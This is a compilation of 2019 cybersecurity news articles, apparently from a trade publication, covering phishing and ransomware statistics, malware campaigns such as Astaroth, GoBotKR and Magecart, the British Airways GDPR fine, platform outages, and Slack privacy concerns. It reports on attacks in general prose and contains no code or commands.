Financial services organizations are suffering from an increased number of phishing attacks, according to a new report Mobile Security in the Financial Services, published by Wandera.
Researchers analyzed 4.7 million events across the subset of devices over the 6-month period. For mobile alone, each organization had an approximate average of 21,000 events. The report found that across other industries, phishing represents 42% of attacks, which is significantly lower in volume than those of the financial services industry, which is 57%.
“Phishing attacks are a daily threat for financial services companies and employees need regular training to help identify phishing attacks – not only via email, but also through social media and other messaging platforms. However, given the growing sophistication of phishing campaigns, FS companies can’t rely on awareness training as the only layer of defense. A multi-level approach needs to be adopted at the endpoint and in the network to offer comprehensive protection against phishing,” the report said.
The financial services industry is also at a higher risk of man-in-the-middle attacks (36%), a full 12 points higher than the cross-industry threat of 24%. The heightened number of threats could be the result of public WiFi usage as well as higher than normal travel activity, the report said.
According to those numbers, for every 20 people in financial services, one individual has their lock screen disabled, resulting in enormous ramifications if the device is lost or stolen. Oddly, though, only 1% of financial services organizations have devices impacted by crypto-jacking, which is lower than the 2.65% detected across other industries.
“In the financial services industry, as in many sectors, the security of client information is the most important asset, so it’s disconcerting to find mobile security still an afterthought,” said Michael Covington, vice president of product strategy at Wandera. “Financial organizations are struggling to keep pace with increasing regulations, rapid cloud migrations and rampant BYOD adoption, among other emerging technology trends, making it crucial that industry security pros work to secure not just the devices, but also the apps installed on them and the data they access."
The UK’s Institute of Information Security Professionals (IISP) has been awarded a prestigious Royal Charter, in a move which could help to attract more people into the industry to combat chronic skills shortages.
The newly named Chartered Institute of Information Security Professionals can now claim to be the authoritative body for the cybersecurity industry in the country. Royal Charters are rarely granted, and only to bodies that are able to prove pre-eminence in their field and who serve the public interest.
Under its new banner, the CIISP will continue its mission to promote knowledge sharing across the profession and develop standards for skills recognition and career development, at home and potentially overseas.
“As the cybersecurity industry continues to grow, professionalization has to be central to its agenda, and the institute’s chartered status will be a key component driving this forward,” said Alastair MacWillson, chair of the Chartered Institute of Information Security Professionals.
“The institute has spent over a decade using uniquely developed frameworks to set standards for skills, experience and roles across the profession and it’s hugely encouraging to see these standards and processes validated by charter incorporation.”
MacWilson also argued that its new status would help the institute encourage more applicants into the industry, which has been suffering from skills shortages for many years.
The global shortfall in information security professionals now stands at nearly three million, including 142,000 in EMEA. Of these, just a quarter (24%) are women.
According to a March Tripwire study, 85% of industry professionals polled claimed their IT security department is already understaffed, with only 1% saying they can manage all of their organization’s cybersecurity needs.
A separate poll for Infosecurity Europe in the same month found that over half (52%) of IT and security professionals believe skills shortages are putting their business at an increased risk of attack.
Microsoft has warned of a new fileless malware attack campaign that completely “lives off the land” in a bid to escape detection.
Andrea Lelli of the computing giant’s Microsoft Defender ATP Research Team first detected the Astaroth campaign after noticing a May-June spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script.
This is a commonly used technique in fileless malware attacks and so it proved this time, with attackers spreading the info-stealing malware via a spear-phishing link to a .LNK file.
“All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.”
During the entire process, no file is run that isn’t a legitimate system tool, which could make it difficult for legacy security solutions to detect.
Heuristics and behavioral monitoring capabilities are key to spotting such fileless threats as they focus on detecting anomalous behavior rather than looking for signatures or executables, Lelli concluded.
Fileless malware and “living off the land” techniques have been around for several years, although they’re being used with increasing frequency today.
Malwarebytes claimed that such attacks comprised around 35% of total threats in 2018, and are 10 times more likely to succeed than file-based attacks.
Earlier this year, Trend Micro revealed a massive 819% increase in detections of fileless threats between August 2017 and December 2018. It claimed that sandboxing, as well as monitoring behavioral indicators and traffic, can help the white hats to combat this growing threat.
Over a quarter of UK firms have suffered a ransomware attack over the past year, a major increase on figures from 2016, according to new research released by Databarracks.
The business continuity provider shared data from its upcoming Data Health Check survey, based on interviews with 400 IT decision makers.
It revealed that 28% of UK organizations have been hit by ransomware over the past 12 months. This is slightly lower than the peak of 29% in 2017, the year WannaCry hit, but much higher than the 2016 figure of 16%.
Databarracks managing director, Peter Groucutt, urged firms to formulate effective incident response plans, including recovery from backup.
“A ransomware attack will ultimately leave a business with two decisions: recover your information from a previous backup or pay the ransom. But even if a ransom is paid, it’s not certain your data will be returned. The only way to be fully protected is to have historic backup copies of your data,” he argued.
“When recovering from ransomware, your aims are to minimize both data loss and IT downtime. Outright prevention is not viable, so organizations should focus on organizing their defensive and preventative strategies to reduce the impact of an attack.”
It’s not just the UK that has seen an increase in ransomware attacks of late. In the US, several Florida cities have been hit, with two of them agreeing to pay the hackers hundreds of thousands of dollars to get their data back.
Although ransomware attacks on consumers decreased 33% year-on-year in Q1 2019, those against corporates surged by over 500%, according to Malwarebytes.
“The incident response team must have the authority to make large-scale, operational decisions quickly. This includes being able to take systems offline to prevent the spread of infection,” explained Groucutt.
“Once isolated and contained, you must find when the ransomware installation occurred to be able to restore clean data from before the infection. When the most recent, clean data is identified you can begin a typical recovery, restoring data and testing before bringing systems back online again.”
The Department of Energy (DOE) engaged in conversations with industry partners in order to advance the cybersecurity of industrial control systems in the nation’s critical infrastructure, including power utilities and pipelines, according to FedScoop and E&E News.
“Private entities and key agencies formed a consortium over concerns industrial control systems (ICS) are increasingly being targeted by nation-states, hacktivists and advanced persistent threats, but such incidents aren’t being discussed,” FedScoop reported.
Since meetings took place over a week ago, a team of industry leaders have set to work with the focus of delivering a report and key recommendations by the end of July, according to Jason Haward-Grau, CISO at PAS Global.
“The DOE’s driver is enabling a safer and more secure pipeline infrastructure, there is no expectation that the accountability will change from the TSA,” said Haward-Grau. “The EU response to both the risks and the need to protect the critical infrastructure space is becoming acknowledged as a solid mechanism for governments to build upon their varied security foundations to establish the framework for cybersecurity in the operational security arena. There are more countries (and even states in the US) looking to establish the same principles, practices that are already being deployed in the EU.”
Because nation states continue to openly demonstrate their enhanced cyber offensive capabilities, governments and private industry alike are increasingly concerned about malicious actors targeting critical infrastructure. Because of the nature and importance of ICS, they are high on the list of targets, driving the growing desire to protect it.
“Coupled with the drive toward digitization of the operational technology (OT) end points, the potential attack surface for OT is growing wider and presents a more attractive target as the opportunity to ‘play the odds’ means the defenders have to be 100% successful to keep their environments secure, whereas the attackers just need to get lucky once,” said Haward-Grau.
“There is an increasing challenge in insuring that we have the right skilled resources available to drive the improved security programs as not only is there a major shortage in IT, there is a lack in OT and the difference between OT and IT is compounding the challenge.”
A malware campaign has been targeting Korean TV torrent websites, according to researchers at ESET.
The malware, which is focused on South Korea, reportedly grants attackers remote control of the compromised devices. Researchers have dubbed the malware Win64/GoBot2 variant GoBotKR given that the actors behind GoBotKR are building a network of bots that can then be used to perform DDoS attacks of various kinds, according to today’s press release.
“The attackers behind this campaign try to trick users into executing the malware by booby-trapping the contents of the torrents with malicious files that have deceptive filenames, extensions and icons,” says ESET researcher Zuzana Hromcová, who analyzed the malware. “Directly opening the intended MP4 file will not result in any malicious action. The catch here is that the MP4 file is often hidden in a different directory, and users might first encounter the malicious file mimicking it.”
Though not very technically complex, the malware collects system information about the compromised computer after being executed. According to the researchers, the information collected includes network configuration, OS version information and CPU and GPU versions along with a list of installed antivirus software.
“This information is sent to a C&C server, which helps the attackers determine which bots should be used in the respective attacks. All C&C servers that we extracted from the analyzed malware samples are hosted in South Korea and registered by the same person,” said Hromcová.
The evasion techniques of GoBotKR are from a researcher’s perspective, said Hromcová. One particularly notable technique is that when the malware scans running processes on the compromised system, it self-terminates if any of the products are detected.
“Overall, the modifications show us that the attackers customized the malware for a specific audience, while taking extra effort to remain undetected in their campaign” said Hromcová.
Due to ‘unforeseen circumstances,” Hillary Clinton has reportedly withdrawn her invitation to deliver the keynote speech at the 2019 FireEye Cyber Defense Summit, according to news from the Daily Caller.
Infosecurity has contacted FireEye and Clinton’s office to confirm that the former US secretary of state will no longer be speaking at the cybersecurity event. Clinton is not listed among the 2019 speakers for the event, and a detailed agenda including keynote details is not yet available on the conference website.
Clinton was invited to participate in a Q&A discussion with FireEye CEO, Kevin Mandia, “on the geopolitical landscape and its implications for global cybersecurity today. Secretary Clinton has been a practicing attorney and law professor, an advocate of internet freedom, First Lady, and US Senator from New York, in addition to serving as the 67th United States Secretary of State,” according to a May 30 press release.
“Differences among nations today, driven by friction in geopolitics, economics, security and technology, are having a significant impact on global cyber conflict. Secretary Clinton’s extensive knowledge of foreign policy, her firsthand experience on the front lines of diplomacy, and her understanding of the challenges facing open, democratic societies give her a unique perspective on some of the most pressing conversations shaping our world today,” said Mandia.
Clinton delivering the keynote address received much fodder on social media, with some expressing ‘laughter’ while others admitting that they cancelled their registrations.
“Just cancelled my plans to go to #FireEyeSummit. No way to trust a cyber company that thinks it is a good idea for a govt official that is willing to run a private, unprotected server, out of her home is a keynote speaker. Her disposal techniques are umm,” one person tweeted.
If Clinton has officially withdrawn, the news has remained tightly under wraps. Despite critics expressing their dissatisfaction at the news that she would be speaking, Twitter has remained very quiet since the Daily Caller reported the news on July 4.
Security researchers have discovered another major digital skimming campaign, this time compromising over 960 e-commerce sites in just a day.
Sanguine Security, which produces a malware scanning tool for popular e-commerce software platform Magento, revealed the findings in a tweet on Friday.
It described the discovery as “the largest automated campaign to date” – with 962 sites infected with the infamous Magecart code.
That’s far higher than the previous number of 700 online stores and indicates a highly automated operation, as the attacks happened in a 24-hour period with victims located around the world.
It’s believed the attacks could be the result of hackers exploiting a vulnerability in Magento.
In March, for example, a critical SQLi flaw was revealed which allows for remote code execution. Although it was patched by the vendor, it may still be exposing countless organizations to the risk of attack.
The destructive power of Magecart has been plain to see over recent months. Just today, airline BA was fined over £183m for failing to protect its web infrastructure from a Magecart attack last year, leading to the compromise of personal data on around 500,000 customers.
The latter appears to be what happened here: with a possible Magento flaw providing simple access for attackers to hundreds of sites running the insecure version of the CMS software.
Sanguine Security has published the new version of the skimming code on GitHub Gist, although confirmed details on how this most recent attack worked have yet to emerge.
Cyber-attacks on UK businesses hit an all-time high in the second quarter of 2019, averaging one every 50 seconds, according to Beaming.
The business ISP analyzed traffic for its customers during the period and found them to be on the receiving end of 146,491 attempted attacks each, on average. That’s 179% higher than the same period in 2018, when firms faced down 52,596 attacks on average.
IoT devices and file sharing services were most frequently targeted, hit by 17,737 and 10,192 attacks respectively during the quarter.
This chimes somewhat with a FireEye report from last month which revealed a dramatic increase in attacks exploiting file-sharing services to deliver malware via email. From hardly being used in any attacks in Q4 2018, OneDrive was seen in over 60% by Q1, it claimed.
Hackers often target file-sharing services with their phishing emails as they bypass the initial domain reputation checks made by security tools.
Beaming also identified over 371,000 unique IP addresses used to launch cyber-attacks in Q2 2019: a plurality were traced back to China, with significant activity also originating in Taiwan, Brazil, Egypt and the US.
However, this is more of an indication of where the most compromised PCs are, rather than necessarily the geographical location of the attackers themselves.
Beaming managing director, Sonia Blizzard, argued that companies of all sizes are under attack.
“The majority of cyber-attacks on businesses are indiscriminate, malicious code that trawls the web seeking to exploit any weak point in cybersecurity systems. A single breach can be catastrophic to those involved,” she added.
“We do lots at a network level to minimize the threat of online attacks, but businesses need to take the threat seriously, educate employees and put in place measures such as managed firewalls to ensure they don’t expose themselves to undue risk.”
The Anti-Fraud Technology Benchmarking Report assessed data from more than 1000 ACFE members regarding their organizations’ use of tech to fight fraud, discovering that while only 13% of businesses currently use AI and machine learning to detect/deter fraudulent activity, another 25% plan to do so in the next year or two.
Other key findings discovered that 26% of organizations are using biometrics as part of their anti-fraud programs, with another 16% expecting to deploy biometrics by 2021, while more than half of respondents (55%) plan to increase their anti-fraud tech budgets over the next two years.
“As criminals find new ways to exploit technology to commit schemes and target victims, anti-fraud professionals must likewise adopt more advanced technologies to stop them,” said Bruce Dorris, JD, CFE, CPA, president and CEO of the ACFE. “However, which technologies are most effective in helping organizations manage rising fraud risks? The answer to this question can be crucial in successfully implementing new anti-fraud technologies.”
Laurent Colombant, continuous controls and fraud manager at SAS, added: “The tools available for fraud prevention are now more intelligent than ever. We’re no longer restricted to merely reacting to fraud after it happens – with the right AI-enabled tools in place, anti-fraud teams can now begin to intelligently predict potential danger spots and flag up early warning signs to ensure efforts are co-ordinated and effective.
“The emergence of AI, machine learning and predictive modelling is helping investigators to pre-emptively detect fraudulent activity, allowing them to stay ahead of the increasingly sophisticated techniques being employed by criminals.”
British Airways (BA) has been hit by a record £183m GDPR fine after failing to prevent a digital skimming attack last year.
UK regulator the Information Commissioner’s Office (ICO) said the £183.39m penalty was levied due to “poor security arrangements” at the carrier, leading to the compromise of personal data on around half a million customers.
“People’s personal data is just that – personal. When an organization fails to protect it from loss, damage or theft it is more than an inconvenience,” said information commissioner, Elizabeth Denham.
“That’s why the law is clear – when you are entrusted with personal data you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”
The fine is the biggest ever levied by the ICO, publicly at least, but still amounts only to around 1.5% of the airline’s global annual turnover as of 2017 – far less than the maximum 4% allowable.
That said, BA will be appealing to the ICO. Chairman and CEO, Alex Cruz, claimed the company responded quickly to the incident and that it has found “no evidence” of the data being used in follow-on fraud.
However, security researchers claimed to have found the stolen personal information up for sale online just a week after the incident.
The attack involved an increasingly popular form of digital skimming code known as Magecart, which was inserted covertly onto the BA site to harvest user card information without its knowledge.
The data stolen included log-in, payment card and travel booking details as well as name and address information, according to the ICO.
Raef Meeuwisse, ISACA expert speaker and author, argued that commentators should refrain from passing judgement until the outcome of BA’s appeal is known.
“This fine is a timely wake-up call for enterprises that under-investment, especially in cybersecurity, is a false economy. It is also a reminder that you cannot just leave mission-critical third-party activities with anything less than mission-critical levels of verified security,” he said.
“However, I think we need to await the outcome of any appeal and what the final amount of the fine really is. If the amount reduces substantially during the appeals process, then the executives in other organizations who are just about to raise the risk-levels and investment in both data privacy and security will probably breathe a sigh of relief.”
The largest forensic services provider in the UK, Eurofins Scientific, has reportedly paid a ransom to criminals after its IT systems were disrupted in a cyber-attack. The amount of the ransom has not been disclosed, though BBC News reported that the attacks also resulted in the British police suspending its work with the global testing company.
Law enforcement agencies have refrained from sending new samples to Eurofins for analysis, according to reports. The Crown Prosecution Service told the BBC: “We are working to make sure all hearings remain fair and based on reliable evidence. While investigations are ongoing, prosecutors will assess the impact on a case-by-case basis. Cases where forensic evidence does not play a major role will continue as usual if all parties agree. If test results provided by Eurofins are central, we will seek to adjourn cases for the shortest possible period.”
Given that the investigation of the attack remains ongoing, Eurofins is refraining from commenting.
“This kind of attack was inevitable. While many security experts warn about paying ransoms or entering into negotiations, the answer in reality comes down to simple economics,” said Barry Shteiman, vice president of research and innovation at Exabeam.
“If the downtime caused by data being unavailable, or by the backup restoration process, is more expensive than paying the ransom, then organizations should pay. Equally, if giving up on the encrypted data has a higher cost in lost revenue or intellectual property than remediation, then you can also see why an organization would pay the ransom. Of course, this is a last resort, if all other options have been exhausted,” Shteiman continued.
Still, ransomware is only one type of attack that organizations need to protect against, said Derek James, regional director of EMEA for WhiteHat Security. “You need to protect against all threats, not one specific one. For the companies that are truly concerned about ransomware, in addition to vulnerability assessments, they can follow some easy industry best practices. Backing up data and using up-to-date encryption will help negate some of the risk of ransomware.”
A survey of 320 IT experts conducted by Gurucul found that one in 10 respondents admitted they would try to take as much company information with them as possible before they left their jobs. In addition, the survey found that 15% of participants would delete files or change passwords upon exiting.
While a number of organizations have invested in technologies to help detect and defend against external attackers, many companies are starting to better understand the risks from insider threats, which a recently published whitepaper said may actually be a larger issue.
According to the report insider attacks are more difficult to detect and prevent than external ones, with 91% of respondents in a similar survey of IT and security professionals reporting they feel vulnerable to both malicious and accidental insider threats.
“Gurucul mitigates these risks by employing behavioral analytics,” said Craig Cooper, COO of Gurucul. “By combining user and entity behavior analytics, and identity analytics, companies can not only monitor, detect and remove excess access before it is too late, but they can also monitor employee actions by detecting unusual or risky behavior. By detecting when users are acting in ways that contradict their normal behavior and job function, our customers are able to intervene.”
At issue is teams are overloaded with identities and entitlements because of the manual processes built into the static identity management rules and roles. “It is more common than not that users inside the perimeter have access to information they do not need for their job. This gives them the capability to perform abusive tasks within the company. However, insider threats are not always caused by users within the organization. They can also occur when credentials of employees are shared or compromised, which often goes undetected,” wrote Gurucul’s Alison DeNisco Rayome in a July 2 blog post.
Though not often seen in the threat landscape, the Golang malware was first identified in mid-2018 and has sustained throughout 2019. Researchers noted the latest operation, which has infected an estimated several thousand machines, began around June 10. The first exploit requests were identified around June 16.
Using the cryptonight algorithm to mine XMR, the attacker has earned less than $2000 USD, a figure based only on the wallets the F5 Labs miners were using. Researchers added that it is possible the attacker has several wallets used by different parts of his botnet.
“F5 researchers detected malicious requests targeting vulnerabilities in ThinkPHP (CVE-2019-9082 and CVE-unassigned), Atlassian Confluence (CVE-2019-3396), and Drupal (CVE-2018-7600) also known as Druppalgeddon2,” the report said.
The malware campaign reportedly propagates using seven different methods, which include four web application exploits, SSH credentials enumeration, Redis database passwords enumeration, and an attempt to connect other machines through the use of discovered SSH keys.
“Some of these vulnerabilities are common targets, however, the delivered malware in this campaign was written in Go (Golang), a newer programming language not typically used to create malware,” the researchers wrote.
As Golang is not typically detected by anti-virus software, malicious actors have started using it as a malware language. “Although the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware. One of the earlier Golang samples was analyzed and published beginning of January 2019,” the report said.
To host the spearhead bash script, attackers reportedly use pastebin.com, an online clipboard service. According to the report, the malware is hosted on a Chinese ecommerce website that has already been compromised. Combined with additional indicators, such as the online clipboard, GitHhub usernames, researchers suspect this could be the work of a Chinese speaking attacker.
Unified Access Management company OneLogin has announced that Joanne Bradford has become the newest member of its board of directors.
Bradford will bring over 30 years of marketing and operations experience to OneLogin’s board, having previously served in CMO and COO leadership positions for companies such as Microsoft, Yahoo, SoFi and Pinterest, as well as board positions for Wave, Adaptly and Comscore.
“Joanne's deep expertise in integrated mass consumer marketing at some of the most well-known and biggest tech companies in the world will be critical for OneLogin at this stage of our accelerating growth,” said Brad Brooks, CEO of OneLogin. “One of many things I love about having Joanne on board is her insights coming by way of looking at things from the end-user perspective. This intuition will play an important role as we continue our momentum capitalising on the multi-billion-dollar market opportunity for our Unified Access Management platform.”
Bradford said: “I am joining the OneLogin’s board during a critical time of exponential momentum and interest in its UAM solution – a solution that every company requires. Enterprises everywhere need OneLogin to navigate the changing landscape of cloud adoption, digital transformation, and cybersecurity. I'm honored to be joining this exceptional team and look forward to much-anticipated success.”
Billions of users were frustrated by not being able to see their images on Facebook, Instagram and WhatsApp this week due to glitches in Facebook's platform, which was triggered by “routine maintenance.”
Instead of pictures and videos, users were shown grey boxes with text describing what was in the image. This is believed to be the company's image analysis software.
This outage isn't the only downfall for Facebook-owned companies. In March, Facebook and Instagram suffered their longest period of disruption in its history. The 14-hour outage was sparked by a server configuration, according to the company.
Speaking on its latest outage, the company tweeted: “We’re aware that some people are having trouble uploading or sending images, videos and other files on our apps. We're sorry for the trouble and are working to get things back to normal as quickly as possible. #facebookdown.
“Earlier today, some people and businesses experienced trouble uploading or sending images, videos and other files on our apps and platforms. The issue has since been resolved and we should be back at 100% for everyone. We're sorry for any inconvenience.” However, some users continued to complain of not being able to see images following.
Other companies also faced outages this week. Cloudflare was brought down by a “bad software deployment” while users have complained that Apple's iCloud has also been down.
However, users also noticed that their images were being tagged, which was the result of the company's artificial intelligence image analysis. The description of these images is meant to support visually impaired users, however, some users couldn't help but feel 'creeped out' by seeing how accurate the description of the image was.
For Facebook, though, the damage might have been done from the outage. According to Bigbom, a decentralized advertising ecosystem company, Downdetector processed over 7.5 million reports from end users during the outage. Interestingly, the company tweeted that this latest outage was the “company's biggest one” in years.
How the outage affected advertisers who use the platform is unknown, but Bigbom believes thousands of dollars in ad revenue would have been lost.
A post written by John Graham-Cumming, CTO of Cloudflare, was published after a 30-minute outage affected Cloudflare's network, resulting in downtime on its sites. The issues were caused by a massive spike in CPU utilization on the company's network, which was a result of a “bad software deploy.” According to Graham-Cumming, once the deployment was rolled back, service returned to normal.
“This was not an attack (as some have speculated) and we are incredibly sorry that this incident occurred,” writes Graham-Cumming. “Internal teams are meeting as I write performing a full post-mortem to understand how this occurred and how we prevent this from ever occurring again.”
“We make software deployments constantly across the network and have automated systems to run test suites and a procedure for deploying progressively to prevent incidents,” wrote Graham-Cumming. “Unfortunately, these WAF rules were deployed globally in one go and caused today’s outage.
“We recognize that an incident like this is very painful for our customers. Our testing processes were insufficient in this case and we are reviewing and making changes to our testing and deployment process to avoid incidents like this in the future.”
A ransomware attack temporarily blocked St John Ambulance staff from accessing its systems, according to its website. At 9am on Tuesday July 2 2019, the attack was detected and was resolved within half an hour.
On its website, St John confirmed that a 'data incident' had taken place and had blocked its employees from accessing the system responsible for booking training courses. However, the organization is "confident" that data has not been shared outside of the company, and that it has informed the Information Commissioner's Office, the Charity Commission and the police of the attack.
Ransomware is a type of malware that gains access to files and systems, blocks them, and often requests a ransom to return access back to the organization. It is the same type of malware that was used as part of the WannaCry attacks on the UK's NHS, which cost the government £92m.
As part of its official FAQ on the attack, St John has confirmed that data such as a person's name, invoicing details and driving license data are among information compromised by the attack. However, those with credit card details are advised not to worry as they are handled by third-party, Barclaycard SmartPay.
“The only data that has been affected relates to our training course delivery,” says the website. “It does not cover supplies, events, ambulance operations, volunteering, volunteer, data, employee data, clinical data or patient data.
“We work as hard as we can to protect our data systems from these types of attacks and employ a range of third-party partners and cyber-crime solutions to continually update our protection.”
The attack comes as research was presented to the House of Lords on Tuesday July 2 2019, on the urgency to address cybersecurity risks within the NHS.
Javvad Malik, security awareness advocate at KnowBe4, commented that St John demonstrated a strong incident response, but that they still need to be vigilant: “It appears as if this ransomware attack is limited to a segregated training system and contains limited data. It's worth noting that SJA has demonstrated strong incident response procedures here with a transparent and timely response notifying the public, police, and the ICO.
“Beyond that, it's unclear how the ransomware infected the systems, but it wouldn't be surprising to hear that the infection arose from a phishing attack,” he continued. “This serves as a reminder that organizations should train their staff on being able to identify a phishing email and not click on malicious links.”
As many as 87% of 280 decision makers have predicted email threats to increase in the coming year, according to a survey by Barracuda Networks.
According to its blog post, many organizations are admitting to being vastly unprepared when it comes to email security, with 94% admitting that “email is still the most vulnerable part of organizations’ security postures.
“Unsurprisingly, finance departments seem to experience the most attacks, with 57% identifying it as the most targeted department," explained Chris Ross, senior vice-president of international sales at Barracuda. “What was surprising was the rise in customer support attacks; a not insignificant 32% identified this as their most attacked department in what could indicate a new emerging trend for would-be attackers.”
The blog goes onto say that employee training is still not a priority for many, with 29% of respondents only receiving such training once a year. More shockingly, 7% stated they’d either never had training or that they weren’t sure.
“The lack of training is clearly leaving employees either confused or unaware of security protocol, as over half (56%) stated that some employees do not adhere to security policies,” Ross continued. “Of those, 40% said their employees used a ‘workaround’ to do so, perhaps referring to shadow IT solutions and the issues they continue to cause in enterprise IT environments.
“Both of these issues could be solved by regular and in-depth employee security training,” he concluded.
Organizations have also seen cyber-attacks come through emails. In the last year, according to the survey, 47% were attacked by ransomware, 31% were victim to a business email compromise attack, and a huge 75% admitted to having been hit with brand impersonation. Barracuda also found that 83% of all email attacks were focused on brand impersonation in its recent spear phishing report.
However, organizations are starting to take matters into their own hands, with 38% of them increasing their security budgets next year, and over a third (36%) planning to implement instant messaging applications such as Slack or Yammer, to reduce email traffic.
“This approach comes with a warning from us,” said Ross. “While we haven’t yet seen attacks using messaging platforms such as Slack, this may well change in the future and doesn’t necessarily mean that these platforms are immune to attacks.
“Any organization going down this route should do so with care, as if we know anything about cyber-attackers, it’s that they’re always trying new ways to catch their victims out.”
These findings interestingly come out following the opinion article published in the New York Times, which highlights Slack's lack of end-to-end encryption, leaving it vulnerable to hackers.
A senior privacy researcher has warned that Slack conversations could be leaked, as well as passwords and usernames, in an opinion article for the New York Times.
Published on Monday, Gennie Gebhart, associate director of research at the Electronic Frontier Foundation, wrote that the business chat app does not have end-to-end encryption even though it “stores everything [a user] does on its platform by default.”
In her op-ed for the New York Times, she wrote: “...which means Slack can read it, law enforcement can request it, and hackers — including the nation-state actors highlighted in Slack’s S-1 — can break in and steal it." According to Slack’s S-1 form, the company has confirmed that it faces threats from “sophisticated organized crime, nation-state, and nation-state supported actors.”
Slack is a business tool which allows people to engage with one another whether they are in the office or not. Using channels to separate conversations and private messaging to enable people to directly communicate with one another, it has been received positively within the workplace in general.
However, Gebhart wrote that while Slack’s paying enterprise customers “do have a way to mitigate their security risk” it's not just them who might be vulnerable to cyber-attacks. She added: “Slack’s users include community organizers, political organizations, journalists and unions. At the Electronic Frontier Foundation, where I work, we collaborate with activists, reporters and others on their digital privacy and security, and we’ve noticed these users increasingly gravitating toward Slack’s free product.”
Slack's free product allows users to have up to 10,000 searchable messages, with any more being stored away on their servers. It also enables one-to-one voice and video calls and file sharing. On its website, Slack stated this about its security: “Slack takes privacy and data protection seriously. As a cloud-based company entrusted with some of our customers’ most valuable data, we’ve set high standards for security.
“We’ve received internationally recognized security certifications for ISO 27001 (information security management system) and ISO 27018 (for protecting personal data in the cloud).”
However, Gebhart was concerned that privacy could be breached with the collaboration tool. She said: “Free customer accounts don’t allow for any changes to data retention. Instead, Slack retains all of your messages but makes only the most recent 10,000 visible to you. Everything beyond that 10,000-message limit remains on Slack’s servers. So while those messages might seem out of sight and out of mind, they are all still indefinitely available to Slack, law enforcement and third-party hackers.
“Slack’s business case for keeping your old messages is to have them ready for you just in case you decide to upgrade to the paid product, which has no limit on the number of messages available for you to search and view. But many users — including those most likely to be in the cross-hairs of a law enforcement request or headline-grabbing nation-state hack — are unlikely to ever make that switch.”
Jake Moore, a cybersecurity specialist at ESET, said that while Slack is a “fantastic application” to help people break away from the downsides of email, it might now come with downsides of its own: “Admittedly, many people don’t think or even care about encryption or place it on a priority list when it comes to data or messaging but in a world where privacy is increasingly becoming more popular, companies need to be thinking about enforcing encryption and privacy for all of their customers by default with no option to bypass it.
“Similarly, companies who don’t use two-factor-authentication by default also put their customers data at risk of having their confidential data viewed by anyone with the right know-how and tools,” he added.
Ending her opinion article, Gebhart gave her recommendations for what the company should do for its customers: “Slack should give everyone the same privacy protections available to its paying enterprise customers and let all of its users decide for themselves which messages they want to keep and which messages they want to delete.”